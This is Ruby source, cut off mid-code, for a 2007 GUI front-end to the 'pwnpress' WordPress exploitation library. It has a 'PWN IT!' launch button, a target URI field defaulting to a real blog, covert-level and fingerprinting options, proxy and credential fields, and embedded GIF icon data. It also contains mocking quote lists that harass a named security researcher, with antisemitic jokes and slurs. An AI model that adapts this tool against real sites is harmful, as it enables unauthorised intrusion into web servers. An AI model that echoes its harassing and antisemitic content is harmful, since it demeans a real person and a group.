Wordpress Pwnpress Exploitation Toolkit. Works on multiple versions. GUI version.
4236e25c7800fe6d54c5450e16f609b6908b17972d3041718a691185d3b31202# Copyright (c) 2007 Lance M. Havok <lmh [at] info-pull.com>. All Rights Reserved.
# Exploits R' Us: bringing the amazing world of exploitation toys to your mom.
# Please read http://www.info-pull.com/code/DISCLAIMER for licensing terms.
begin
require 'pwnpress'
require 'rubygems'
require 'fox16'
include Fox
rescue
puts "Need rubygems, fxruby and pwnpress!"
exit
end
# gif streams free of evil, no infinite gif parsing advisories for you
THE_EVIL_RABBI = "\x47\x49\x46\x38\x39\x61\x30\x00\x30\x00\xd5\x37\x00\x1d" +
"\x1d\x1d\x47\x49\x49\xec\xf2\xf1\x29\x29\x29\x38\x38\x38" +
"\xe5\xd2\x52\x3f\x3f\x3f\x25\x25\x25\xbd\xca\xb8\x6e\x71" +
"\x71\x64\x56\x15\x35\x4d\xc8\xaa\xb8\xa5\xff\xf2\x9b\x87" +
"\x8a\x89\x4c\x42\x00\x45\x49\x44\x92\x9d\x8e\x43\x43\x43" +
"\x97\xa1\x93\x8d\x82\x33\x18\x1c\x17\xad\x9f\x3e\x28\x28" +
"\x28\x81\x77\x2e\x94\x98\x97\x00\x00\x00\x7e\x8b\x9b\x1f" +
"\x2d\x76\x90\x9c\x8c\x69\x6f\x67\x4b\x4b\x4b\x90\x9a\x8c" +
"\x42\x42\x42\x0c\x1a\x0b\x67\x6e\x64\x86\x86\x86\xb1\xbb" +
"\xae\xba\xba\xba\x5a\x5a\x5a\x0d\x0e\x28\x89\x8d\x8d\x64" +
"\x6c\x61\xab\xab\xab\x34\x3a\x32\x88\x75\x1d\x15\x19\x13" +
"\x92\xa0\xb2\x21\x33\x1f\x21\x21\x21\x3a\x42\x4c\x6f\x77" +
"\x81\x4c\x58\x51\x31\x31\x31\x09\x0a\x1c\xff\xff\xff\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x21\xf9\x04\x01\x00" +
"\x00\x37\x00\x2c\x00\x00\x00\x00\x30\x00\x30\x00\x00\x06" +
"\xff\xc0\x9b\x70\x48\x2c\x1a\x8f\xc8\xa4\x72\xc9\x6c\x3a" +
"\x9f\xd0\xa8\x74\x4a\xad\x5a\xaf\xd8\xac\x76\xcb\xed\x7a" +
"\xbf\xe0\x29\x80\x30\x28\x9b\x07\x21\x40\x98\x38\x3e\x9f" +
"\x43\x6b\x61\xdb\xfd\x8e\x03\xee\xf8\x3c\xde\x3b\x20\xf8" +
"\xff\x80\x81\x82\x04\x5a\x7a\x86\x87\x7b\x5d\x01\x1b\x34" +
"\x14\x14\x16\x8e\x91\x16\x01\x20\x01\x61\x01\x1d\x33\x16" +
"\x05\x9c\x9d\x05\x16\x32\x95\x97\x1d\x18\x9b\x05\x25\xa7" +
"\x9c\x0d\x0f\x1d\x96\x60\x01\x0c\x18\x10\xb3\x10\x05\xb4" +
"\x10\xac\xae\x5f\xb0\x18\x02\x36\x02\x18\x9f\xbe\x02\x0f" +
"\x0c\xba\x5e\xbc\x05\x0d\x0d\x18\x0d\xca\xcb\xc5\xc7\x8a" +
"\x0c\x1e\xa6\x0f\xd7\x9d\xd1\x97\xc6\x1e\x1e\x08\xdf\xdf" +
"\x1b\x1e\x2a\xc6\xdb\x01\x29\x29\x1a\xea\xea\xdf\x2a\xa2" +
"\xaf\x11\x01\x23\x08\x2f\xe0\xe1\x23\xf1\x6b\x01\x2e\x01" +
"\x11\x13\x13\xdf\x22\x6c\x88\x30\x42\x1a\x97\x5f\x02\x1c" +
"\x88\x58\x04\x10\x41\x84\x08\x0e\x3e\x08\x10\x70\xc1\x8b" +
"\x8d\x04\x13\x13\x2e\xfc\xe7\x50\x84\x83\x8c\x24\x2a\x6e" +
"\xb1\x51\x83\xc3\x82\x93\x0e\x1c\xb0\xf8\x37\x01\x46\x0c" +
"\x93\x27\x3f\x84\xdc\x82\xa2\xe4\xc9\x05\x12\x32\x08\x38" +
"\x70\x60\xa2\x0d\xa9\x98\x0b\x6a\x7c\xb0\x41\xb3\x06\xc6" +
"\x89\x12\x1c\x64\xe0\x99\xc1\xc1\xc5\x8c\x35\x0c\x10\xd5" +
"\x42\xf2\xa8\x80\x1a\x39\x99\x3a\x90\x60\xf5\x82\xd4\x91" +
"\x46\x13\x88\xad\x81\xd5\xc6\x01\x1b\x12\xc2\x8a\xb5\x71" +
"\x61\x6a\x16\x92\x52\xcd\x92\x2d\x9b\x76\xee\x59\xb6\x6e" +
"\xb1\xc0\xb5\x21\x77\x2e\xc9\xb9\x35\xee\x7a\xd5\xa2\xe0" +
"\x84\x89\x15\x66\x0f\x00\xfe\x6b\xd7\x86\xe1\x15\x0a\xb2" +
"\x28\x50\xa5\x80\xaf\xe5\xcb\x98\x5b\x28\x8b\x2c\x59\x81" +
"\x67\xb3\x06\x42\x8b\x1e\x6d\xc3\xb3\xe7\x2f\x7d\x6b\x58" +
"\x9e\xfb\x75\x4d\x6a\xa2\x8c\x5b\x87\x79\x7d\x23\x76\x5e" +
"\xd4\x8a\xc9\xc2\x66\x7d\xdb\x4b\x85\xdc\xaa\x6f\x54\xe0" +
"\x1d\xe7\xb7\x5f\xe1\xc4\x67\x63\xae\x50\x7b\xb9\xf2\xcb" +
"\xcc\x31\xf3\x85\x12\x04\x00\x3b"
THE_REAL_HERO = "\x47\x49\x46\x38\x39\x61\x30\x00\x30\x00\xe6\x41\x00\x06" +
"\x0b\x22\x28\x00\x00\x1a\x38\xa6\x27\x51\xf6\x1e\x3e\xbd" +
"\x1b\x3a\xaf\xfa\x00\x00\x18\x33\x99\x15\x2d\x88\xf4\x5f" +
"\x5f\x26\x38\x7d\x26\x4f\xf0\x20\x42\xca\xc8\xa0\x8b\xb5" +
"\x7f\x62\xc5\xad\x0f\x0b\x17\x46\xb4\x0d\x0d\x30\x04\x04" +
"\xf3\xd5\x13\xac\x10\x10\xa9\x94\x0d\x3a\x26\x1c\xa2\x6a" +
"\x4d\xff\xff\xff\x5e\x08\x08\x45\x66\xe2\xff\x53\x53\x25" +
"\x03\x03\x44\x06\x06\xdd\xb1\x9a\x02\x04\x0b\x75\x91\xff" +
"\x1e\x3e\xbe\x60\x78\xd3\xd1\x00\x00\xea\x11\x11\xa5\x0c" +
"\x0c\x8a\xa0\xf6\x61\x07\x07\x91\xa5\xee\xdb\xe1\xf9\xb0" +
"\x00\x00\x76\x89\xd3\xe6\x15\x15\xe5\xd2\xc8\x24\x4b\xe6" +
"\x3c\x5d\xdb\xc7\x9f\x89\x75\x4d\x38\xe5\xd3\xc8\xc1\x94" +
"\x7d\xff\xcc\xb2\x85\x57\x3f\xc8\xa1\x8b\xc1\x95\x7d\xc7" +
"\xa1\x8c\x23\x4a\xe1\xff\x81\x81\x1c\x3a\xb2\xb4\x80\x63" +
"\x3d\x42\x66\x6a\x84\xe8\x08\x12\x36\x22\x47\xd9\xff\xff" +
"\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x21\xf9\x04\x01\x00\x00\x41\x00\x2c" +
"\x00\x00\x00\x00\x30\x00\x30\x00\x00\x07\xff\x80\x41\x82" +
"\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" +
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x93" +
"\x00\x3f\xa1\x3f\x9e\x8b\xa1\x22\xa7\x3e\x29\xa1\xa4\x87" +
"\x3f\x22\x3e\x40\x40\x2e\x2e\x40\xa9\xa3\xac\x83\x3f\xb0" +
"\xb1\xbc\xbc\xaa\xb8\x41\xba\x40\x0a\xc4\xbc\xc4\x0a\x40" +
"\xb7\xac\x3f\xc3\x28\x18\x28\xc8\x0a\xce\xd0\x26\xca\x9d" +
"\x00\xb0\x0a\x18\x1f\x18\x3d\xc4\xdb\x18\x0a\x3e\xd5\xa4" +
"\xcc\xb1\xc5\x08\x37\x08\xc3\xc8\x40\x0b\xd6\x9a\xc2\xbd" +
"\x08\x17\x33\x32\xeb\xbc\x0b\x20\xf0\x96\x00\xa0\xbb\xb1" +
"\x10\x38\xb8\xe0\xa1\x85\x07\x7c\xee\x7c\xac\xba\xe4\xcf" +
"\x87\x42\x80\x02\x07\x62\x68\xd1\x00\x06\xbe\x05\x0a\xab" +
"\xf1\x7b\x84\x0d\x96\x00\x79\x11\x1d\x58\x18\xd9\xa0\x81" +
"\x8d\x75\x18\x99\x99\xc0\xb0\xd0\x51\x80\x97\x00\x3f\xc2" +
"\x42\xd0\xc0\x41\x8c\x81\x17\x2e\x34\xa8\xd1\x00\x07\x82" +
"\x94\x0e\x7d\x80\x00\xf1\x32\x00\xa3\x00\x1b\x36\x18\x00" +
"\x72\xe0\x40\x01\x20\x32\x81\x08\x1c\x49\x95\x24\x82\x17" +
"\x3e\x00\xf4\xaa\xb5\x41\x07\x06\xa3\x8b\x02\x18\xd8\xe0" +
"\x0f\xc8\x53\xa8\x1f\x16\x44\xcc\x79\x81\x86\xce\x06\x08" +
"\xff\xb2\xc6\xc2\x78\x20\x94\x01\x03\x60\x8f\x1a\x95\x00" +
"\xe0\xac\x00\x00\x6a\x79\x38\x70\xd0\xc0\x83\xe1\x92\x71" +
"\x3f\xcc\x05\x01\x40\xd0\xcb\x48\x12\x28\x00\xd0\x50\xe0" +
"\x29\x36\xb5\x83\x4b\x96\x3c\xb8\x00\x88\xe2\x5a\x0b\x00" +
"\x74\x98\x14\x19\x80\x53\xca\x50\x01\x88\x88\x15\xd4\x61" +
"\x2d\xcf\x02\xe6\xea\x13\x0d\x99\x82\x01\xd3\x95\x29\x17" +
"\xf8\x28\xaa\xb7\xa8\xd8\x2b\x58\x87\x36\x30\xda\x51\x64" +
"\x03\x19\x70\xa3\x06\x02\xa1\x82\xf3\xe7\xd0\x2b\x40\x18" +
"\x30\x60\xc5\x80\x5a\xfb\x88\x1b\x1f\x91\xfc\x00\x90\xe5" +
"\xcc\x1f\x4c\x78\xf0\x80\x82\x79\xf2\xe3\x21\xe4\xa0\x6e" +
"\xbd\xd6\x0f\xed\x8c\x8e\x77\x47\x4d\x80\x00\x83\x10\x10" +
"\xc4\x4f\x60\x31\xa1\x7f\x7a\xea\x00\x52\xa7\x10\x7c\x8b" +
"\x48\x30\x02\x72\xa6\xd1\x67\xdf\x7d\xf9\xed\xc7\x02\x05" +
"\xe9\xf5\xb2\x00\x80\x03\x12\x88\x48\x64\x14\x64\x30\xdf" +
"\x53\xf5\x31\xc0\x00\x10\xf8\x95\xd7\xdf\x03\x10\x6c\x05" +
"\x04\x85\xef\x49\xd0\x88\x04\x12\x68\x88\xdb\x0e\x1e\x7e" +
"\xc8\x4b\x88\x11\x9a\x88\xa2\x8a\x8f\xb4\x88\x1b\x10\x0b" +
"\x6e\x15\x62\x89\x26\xc6\x22\xe0\x46\x05\xee\xd8\xa3\x8f" +
"\x40\x06\x79\xe2\x91\x00\x0a\x7d\xe2\x14\x8f\x32\x2a\xa9" +
"\x24\x8a\x4e\x72\xe8\xa1\x94\x41\x52\x47\x00\x93\x44\x32" +
"\xd2\x57\x6c\xf6\xd5\x27\xe6\x98\x64\x8e\x29\x40\x93\x94" +
"\x98\x06\x95\x00\x6c\xb6\xe9\xe6\x9b\x6f\xc2\xd2\x65\x23" +
"\x1c\x94\x40\x42\x02\x78\xe6\xa9\xe7\x9e\x7b\x92\xc0\x01" +
"\x26\x75\x92\x10\xc1\xa0\x84\x9e\x30\x68\x09\x86\x12\x4a" +
"\xa8\x9f\x9a\xd4\x19\xe4\x09\x1c\x9c\x10\x24\xa3\x9b\x98" +
"\x06\x50\x2c\x8d\x69\xb5\x55\x56\x9e\xa8\xc9\xcb\x01\x99" +
"\x7a\xc7\x0b\xa7\xa4\x20\x75\x97\x0a\x79\x05\xa0\xc2\x81" +
"\x1b\xe4\xd5\x09\x52\x07\xa2\x5a\x48\x00\x07\x8e\xe5\xea" +
"\x26\x45\x15\x35\x6b\xae\xb7\x2a\x12\x08\x00\x3b"
HERE_COMES_MRBEAR = "\x47\x49\x46\x38\x39\x61\x1d\x00\x20\x00\xf7\x00\x00\x6b" +
"\x29\x5a\x63\x52\x84\x8c\x29\x4a\x8c\x39\x4a\xad\x42\x4a" +
"\xa5\x5a\x5a\xbd\x73\x52\xc6\x6b\x4a\xe7\x42\x52\xff\x7b" +
"\x4a\xf7\xbd\x31\xef\x9c\x6b\xf7\x8c\x6b\xff\xe7\x7b\xad" +
"\xb5\xff\xce\xff\xff\xff\xff\xff\xf7\xbd\x31\x00\x00\x00" +
("\x00" * 700) +
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x21\xf9\x04" +
"\x01\x00\x00\x11\x00\x2c\x00\x00\x00\x00\x1d\x00\x20\x00" +
"\x00\x08\xfe\x00\x23\x08\x14\x08\xa0\xe0\xc0\x83\x08\x13" +
"\x2a\x8c\x50\xd0\xe0\xc0\x86\x00\x16\x2e\x84\x68\x10\x40" +
"\x01\x03\x18\x0b\x38\x6c\x28\x91\x62\x41\x03\x0c\x42\x66" +
"\xd4\x48\x51\xa1\xc7\x82\x21\x53\x1a\x20\xe9\xb1\x23\xc5" +
"\x94\x0c\x0c\x9c\x8c\xe8\x12\xa2\xca\x99\x0e\x13\x5a\x64" +
"\xc0\x12\xa4\xcc\x86\x2b\x0b\x68\xec\x58\x20\xa4\x83\x07" +
"\x0e\x3e\x36\x74\x20\x52\xe8\x50\x85\x45\x19\x1c\x45\x5a" +
"\x50\xe3\xd4\x07\x4d\x9f\x22\x04\x00\x92\xc1\x03\x08\x0d" +
"\x85\x36\x84\x00\x01\x2b\x4f\xb1\x09\xa3\x3a\x20\x5b\x35" +
"\x26\x49\xb2\x10\x98\x06\xa5\xf9\xb0\xeb\x5a\xb0\x5c\x45" +
"\x16\x84\xcb\xf4\xac\xd6\x08\x17\x8d\xc2\x85\x00\xf3\x2b" +
"\xdf\xac\x74\x77\xa6\x9c\xda\x57\x30\xd9\xc6\x7e\x69\xe6" +
"\x85\x49\x59\xa4\x83\xcb\x94\xe7\x0a\x0c\x1c\xa0\xef\xca" +
"\x93\x81\x61\x06\x1d\xca\x19\x42\x00\x8d\x02\x52\xab\x4e" +
"\x6d\x11\xa4\x83\x00\x6e\xd1\xb6\xee\xfc\x20\x00\x01\x02" +
"\x08\x72\x23\xb8\xad\x1a\x40\x00\xd3\x23\x87\x5a\x14\x1a" +
"\x20\x80\x00\xdc\xba\x75\xf3\x0e\x80\x34\xc0\xe8\xa7\x55" +
"\xc5\xe2\xac\x5a\xdc\x29\xda\x08\x02\x12\x24\x40\x20\x00" +
"\xa2\x50\x8c\xe0\xad\x6f\x5b\xdf\x98\x60\xc1\x82\xed\x00" +
"\x0e\x98\x5f\x70\x60\x3a\xc7\x87\x00\x04\x20\xd0\x8e\x00" +
"\xc0\x82\x06\xf8\xf3\xe3\x3f\xc0\x7f\x00\xdd\x83\xf1\xb1" +
"\x36\x9f\x7d\xfa\xe9\xc7\x5f\x80\x02\x98\xd4\x5b\x7d\xea" +
"\x15\xd8\x00\x7b\xf1\xe9\x96\xa0\x4e\xf1\x55\x08\xc0\x00" +
"\xf7\xe1\x67\x5e\x7b\xf2\x69\xa7\xdd\x84\x14\xfe\xc7\xdf" +
"\x01\x03\xf8\x17\xa1\x76\xe7\x25\x00\xa2\x44\x1d\x75\xe8" +
"\x61\x7d\x2c\xc6\x78\xe2\x76\xdd\xc5\x28\x23\x82\x35\xda" +
"\x78\x63\x4e\x01\x01\x00\x3b"
THE_POWER_HEAD = "\x47\x49\x46\x38\x39\x61\x30\x00\x30\x00\xd5\x32\x00\x00" +
"\x47\x65\x93\xba\x86\x16\x86\x94\x34\x34\x1a\x48\x1a\x29" +
"\x08\x5f\x77\x7d\x80\xb1\x2f\x2f\x66\xcc\xd3\x7d\x26\x34" +
"\x38\x46\x45\x68\x58\x73\x62\x34\x47\x4d\x24\xae\xb1\x4c" +
"\x4c\x50\xa5\xa6\xd5\x01\x37\x7a\xc7\xc6\xcc\xab\xae\xb2" +
"\xf0\x6d\x5c\xcd\xcc\xd1\x55\x57\x8b\xfb\xfb\x20\xf8\xfb" +
"\xff\x47\x48\x5b\xa9\xaf\x6e\x77\x7a\x8c\x2e\x2d\x5a\xb8" +
"\xb9\xe7\xd5\xd3\xd5\xb5\xb4\xbe\x4c\x4e\x6b\x6c\x70\x46" +
"\x9c\x39\x5a\x6b\x6b\x86\xa9\x28\x3a\x8a\x89\x9d\xac\x99" +
"\x53\x1f\x7e\xc7\x00\x00\x32\x4f\x4b\x64\xdd\xe0\xeb\xff" +
"\x74\x76\x7b\x9c\x70\xff\x48\x48\xac\xac\x1e\x42\x59\x56" +
"\x97\x95\xaf\xf2\xef\xec\xaf\xb1\xde\xff\xff\xff\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x21\xf9\x04\x01\x00" +
"\x00\x32\x00\x2c\x00\x00\x00\x00\x30\x00\x30\x00\x00\x06" +
"\xff\x40\x99\x70\x48\x2c\x1a\x8f\xc8\xa4\x72\xc9\x6c\x3a" +
"\x9f\xd0\xa8\x74\x4a\xad\x5a\xaf\xd8\xac\x76\xcb\x15\x36" +
"\xba\x51\x40\xe1\x0b\x6e\x8a\x05\x0d\x72\x39\x29\x2e\x14" +
"\xd0\xea\x2d\x60\x7e\x1c\x38\xee\xf8\xbb\x71\x4e\x0f\x0b" +
"\xfe\x7d\x42\x03\x1e\x30\x85\x86\x30\x1e\x0e\x43\x73\x69" +
"\x69\x00\x52\x67\x68\x74\x83\x87\x95\x89\x32\x00\x7f\x7f" +
"\x0d\x8f\x53\x91\x8e\x03\x11\x1e\x14\xa4\x95\x30\x0e\x73" +
"\x6f\x68\x05\x55\x6d\x9b\x0d\x02\x11\xa6\x87\xa8\x9a\x02" +
"\x05\x9d\x54\xae\x9a\x11\x24\xa4\x14\x12\xbe\xa5\xb7\x9a" +
"\xb8\x57\x6d\x6e\x6f\x11\x1a\x29\x17\x17\x12\xcc\xce\x30" +
"\xb6\x02\xb9\x56\xc8\x28\x00\xcb\x12\x27\xcf\x1a\xdc\x17" +
"\xd3\x28\x80\x72\x6e\x03\xda\xdf\x12\xde\x12\xea\x85\x03" +
"\xd5\x5d\x62\xa1\xbd\x1f\x1f\x23\x2c\x2a\xf5\x1f\x85\x6e" +
"\xd6\x59\xf2\x03\x32\x44\x88\x90\x61\x84\xc1\x0c\x86\x06" +
"\x18\x03\x33\x27\x60\x06\x04\x10\x23\x22\x78\x78\xce\x1f" +
"\x97\x80\x08\x06\x68\xdc\x38\x00\xe2\x80\x35\x43\x06\x80" +
"\x90\x48\x12\xc4\x47\x90\x32\x0e\x1c\x18\x49\x12\x01\x88" +
"\x03\x27\xc1\xa8\x3c\x50\xa1\x26\x86\x9b\x38\x31\x0c\xa8" +
"\x30\xf3\x00\x97\xf0\x03\x06\x1e\xc4\x88\x51\xc1\x00\x04" +
"\x13\x47\x93\x1a\xa8\x10\x83\x83\x53\x9f\x5a\x0e\x3c\x98" +
"\x3a\xb4\x02\x84\xab\x58\x21\x30\x1d\xda\x14\x2a\x16\xa0" +
"\x42\x83\x72\x8d\x61\xa0\xec\xd8\x18\x2f\x86\x72\xf0\x6a" +
"\x05\xe8\xd0\xb2\x42\xcf\x8e\x35\xb0\xc1\xc0\x50\xb6\x55" +
"\x7a\x02\x15\x2b\x97\x2c\xdd\x0d\x80\xf1\x52\x19\x50\xc2" +
"\xc2\x80\xbd\x71\xfb\x96\x1d\x60\xc1\x70\x16\xc2\x86\x11" +
"\xf7\x7d\x6b\x80\xb1\x63\x2c\x90\x0f\xc3\x9d\xec\x77\x40" +
"\x8b\xcb\x57\x14\x88\x18\xad\x80\x81\xe9\xd3\xa8\x4f\x1f" +
"\x50\xc0\x5a\x41\x16\x05\x1d\x0a\x29\x48\xb0\x20\x80\xed" +
"\xdb\xb8\x13\xc0\x8e\xed\x1a\x0b\x6c\x18\x22\x66\xd7\xc6" +
"\x4d\x5c\xf7\xef\xde\xa1\x5b\xcb\xa0\xed\x62\x81\xf3\xe7" +
"\xce\x03\x24\x90\xd1\x1a\xf9\x16\xda\x0b\x52\x9b\x5e\x21" +
"\x1d\xe5\xf2\xe1\x2b\xa6\xd3\xbe\x3d\x1d\xe5\x78\xdb\xe2" +
"\x87\x77\x37\xaf\x3e\x3d\x79\xef\xe7\xbb\xc7\x2f\x5f\x86" +
"\x80\xfd\xfb\x04\xa6\xe3\xc7\x0f\x86\x40\x88\x10\x2a\x4c" +
"\x20\xe0\x04\x04\xc8\x40\xc0\x80\x02\xfe\x57\x20\x17\xfb" +
"\xf1\xd7\xe0\x7d\x4e\x04\x01\x00\x3b"
# Amazing Fortune Lunches
EVRONIAN_QUOTES = [
"Buy me two lunches, INFOWAR INFOWAR! GRONF! ARABSAT HAXHAHAXHAXHAX YAHWEH!",
"It's the perfect crime, both low-risk and high-profit.",
"The war to make the Internet safe was lost long ago, and we need to figure out what to do now.",
"It is obvious how the bad guys abuse this, and infect millions of computers just because their owners surf the net.",
"Anyone up to doing some monkey fuzzing on that interface?",
"Some training or awareness information on this subject distributed to your organizations could be very useful.",
"Default passwords, especially in widely distributed devices, are bad.",
"Buzzwords for FUD are generally a bad idea. Botnets are not terrorism. :P",
# This one is 'real^2' fucking hilarious. cyber war, dude. fear, etc.
"These cyber terrorism forums have a real connection to real terrorism.",
"This connection between the real and virtual worlds when it comes to terrorism, is important.",
# The egomaniac-lunatic-o-dramatic series
"First, why do I think I'm expert enough on this subject to comment?",
"I've had the honour to serve in an Information Security capacity with the Israeli Military Intelligence corps.",
"I've had the pleasure of being the chief defender (CISO) of the Israeli Government's Internet Security Operation.",
"I've the incredible reality of establishing and running the Israeli Government CERT.",
"I've had the unquestionable fun of coordinating security efforts of Israeli ISP's with joint incident response.",
"Over a decade of experience in Information Security, while currently employed at Beyond Security.",
# FUCK YEAH, MASS DESTRUCTION SOUNDS SO FUCKING COOL!
"To our knowledge we have never been hacked.",
"Real Information Warfare is considered a Non-conventional Weapon, much like with Weapons of Mass Destruction.",
"Most botnet C&Cs are a compartmentalized group out of the whole, ... Much like a terrorism cell.",
# He needs some real sex urgently, with humans if possible.
"Wife or whore?", # how about asking yours? hehe, just kidding
"cho cho cho cho all aboard the JewBus! boxing match!"
]
# update this array when new pwnpress.rb versions come out
SUPPORTED_VERSIONS = [ "auto", "2.2.2", "2.2", "2.1.3", "2.0.5", "1.5.1.3",
"1.5.1.1" ]
class String
def stripfmt
self.gsub!(/\t/, '')
self.gsub!(/\n/, '')
self.gsub!(/\n+/sm, " ")
return self
end
end
class PwnFoxGui
attr_reader :sound_pid
def initialize(width = 660, height = 500)
@pwnApp = FXApp.new()
@mainWin = FXMainWindow.new(@pwnApp, "ALERT TERRORIST ALERT PWNPRESS ALERT INFOWAR ALERT",
:opts => DECOR_ALL|LAYOUT_FIX_WIDTH|LAYOUT_FIX_HEIGHT, :width => width,
:height => height)
@control = {}
@options = {}
@options[:version] = FXDataTarget.new("auto")
@options[:proxy_host] = FXDataTarget.new("localhost")
@options[:proxy_port] = FXDataTarget.new(8118)
@options[:target] = FXDataTarget.new("http://blogs.securiteam.com/")
@options[:username] = FXDataTarget.new("")
@options[:password] = FXDataTarget.new("")
@options[:covert_level] = 0
@options[:table_prefix] = nil
@options[:fingerprint] = true
@sound_pid = nil
self.draw_controls
end
def activate
@pwnApp.create
@mainWin.show(PLACEMENT_SCREEN)
play_soundtrack
@pwnApp.run
end
def draw_controls
rframe = FXVerticalFrame.new(@mainWin, LAYOUT_SIDE_RIGHT|LAYOUT_FILL_Y|PACK_UNIFORM_WIDTH)
FXVerticalSeparator.new(@mainWin, LAYOUT_SIDE_RIGHT|LAYOUT_FILL_Y|SEPARATOR_GROOVE)
lframe = FXHorizontalFrame.new(@mainWin, LAYOUT_SIDE_LEFT| FRAME_NONE|LAYOUT_FILL_X|
LAYOUT_FILL_Y|PACK_UNIFORM_WIDTH,
:padding => 10)
# right frame controls...
boombutton = FXButton.new(rframe, "PWN IT!")
boombutton.connect(SEL_COMMAND, method(:launchPwn))
boombutton.icon = FXGIFIcon.new(@pwnApp, THE_POWER_HEAD)
quit = FXButton.new(rframe, "POOOO!", nil, @pwnApp, FXApp::ID_QUIT)
quit.icon = FXGIFIcon.new(@pwnApp, HERE_COMES_MRBEAR)
infowar = FXButton.new(rframe, "INFOWAR!", nil, @pwnApp)
infowar.icon = FXGIFIcon.new(@pwnApp, THE_EVIL_RABBI)
infowar.connect(SEL_COMMAND) do |sender, selector, data|
ret = evroni_fortune()
while ret != MBOX_CLICKED_NO
ret = evroni_fortune()
end
FXMessageBox.error(@pwnApp, MBOX_OK, "Gadi Evron is not amused",
"INFOWAR ON YOU! YOU EVIL HACKER! I AM AN HERO!")
end
covert_level = FXDataTarget.new(2)
covert_level.connect(SEL_COMMAND) do
case covert_level.value
when 0
@options[:covert_level] = 2
when 1
@options[:covert_level] = 1
when 2
@options[:covert_level] = 0
end
end
covertopt = FXGroupBox.new(rframe, "Covert level", GROUPBOX_TITLE_CENTER|FRAME_RIDGE)
FXRadioButton.new(covertopt, "Low", covert_level, FXDataTarget::ID_OPTION+2)
FXRadioButton.new(covertopt, "Medium", covert_level, FXDataTarget::ID_OPTION+1)
FXRadioButton.new(covertopt, "High", covert_level, FXDataTarget::ID_OPTION)
enableFinger = FXCheckButton.new(covertopt, "Enable fingerprinting")
enableFinger.connect(SEL_COMMAND) do |sender, sel, checked|
if checked or @options[:version].value == "auto"
@options[:fingerprint] = true
else
@options[:fingerprint] = false
end
end
copy = FXLabel.new(rframe, "Copyright (c) 2007\nLance M. Havok.\n" +
"<lmh [at] info-pull.com>\nAll Rights Reserved.\n" +
"Icons from pixeljoint.com\n\nExploits 'R Us:\n" +
"Toys even your mom can use.", nil)
copy.font = FXFont.new(@pwnApp, "System", 8)
# Now the left frame(s)
flayout = FXMatrix.new(lframe, 2, MATRIX_BY_ROWS|LAYOUT_FILL_X|LAYOUT_FILL_Y, :padding => 0)
targetopt = FXGroupBox.new(flayout, "Target settings", GROUPBOX_TITLE_CENTER|FRAME_RIDGE)
urimatrix = FXMatrix.new(targetopt, 2, MATRIX_BY_COLUMNS|LAYOUT_FILL_X)
FXHorizontalSeparator.new(targetopt, SEPARATOR_GROOVE|LAYOUT_FILL_X)
secmatrix = FXMatrix.new(targetopt, 2, MATRIX_BY_COLUMNS|LAYOUT_FILL_X)
moreopt = FXGroupBox.new(secmatrix, "Optional", GROUPBOX_TITLE_CENTER|FRAME_RIDGE)
proxyopt = FXGroupBox.new(secmatrix, "Proxy settings", GROUPBOX_TITLE_CENTER|FRAME_RIDGE)
optmatrix = FXMatrix.new(moreopt, 2, MATRIX_BY_COLUMNS|LAYOUT_FILL_X)
proxymatrix = FXMatrix.new(proxyopt, 2, MATRIX_BY_COLUMNS|LAYOUT_FILL_X)
# Required settings
FXLabel.new(urimatrix, "URI (with WP path):", nil)
FXTextField.new(urimatrix, 36, @options[:target], FXDataTarget::ID_VALUE,
FRAME_SUNKEN|FRAME_THICK|LAYOUT_FILL_ROW)
FXLabel.new(urimatrix, "Target version:", nil)
versionbox = FXListBox.new(urimatrix, @options[:version], FXDataTarget::ID_VALUE,
LAYOUT_FILL_X|LAYOUT_FILL_Y|FRAME_SUNKEN|FRAME_THICK, 0, 0, 200, 0)
SUPPORTED_VERSIONS.each do |v|
i = versionbox.appendItem(v)
end
versionbox.connect(SEL_COMMAND) do |sender, sel, clicked|
@options[:version].value = versionbox.getItemText(clicked)
end
# Optional settings
FXLabel.new(optmatrix, "Username:", nil)
FXTextField.new(optmatrix, 12, @options[:username], FXDataTarget::ID_VALUE,
FRAME_SUNKEN|FRAME_THICK|LAYOUT_FILL_ROW)
FXLabel.new(optmatrix, "Password:", nil)
FXTextField.new(optmatrix, 12, @options[:password], FXDataTarget::ID_VALUE,
FRAME_SUNKEN|FRAME_THICK|LAYOUT_FILL_ROW|TEXTFIELD_PASSWD)
FXLabel.new(proxymatrix, "Hostname:", nil)
FXTextField.new(proxymatrix, 14, @options[:proxy_host], FXDataTarget::ID_VALUE,
FRAME_SUNKEN|FRAME_THICK|LAYOUT_FILL_ROW)
FXLabel.new(proxymatrix, "Port:", nil)
FXTextField.new(proxymatrix, 5, @options[:proxy_port], FXDataTarget::ID_VALUE,
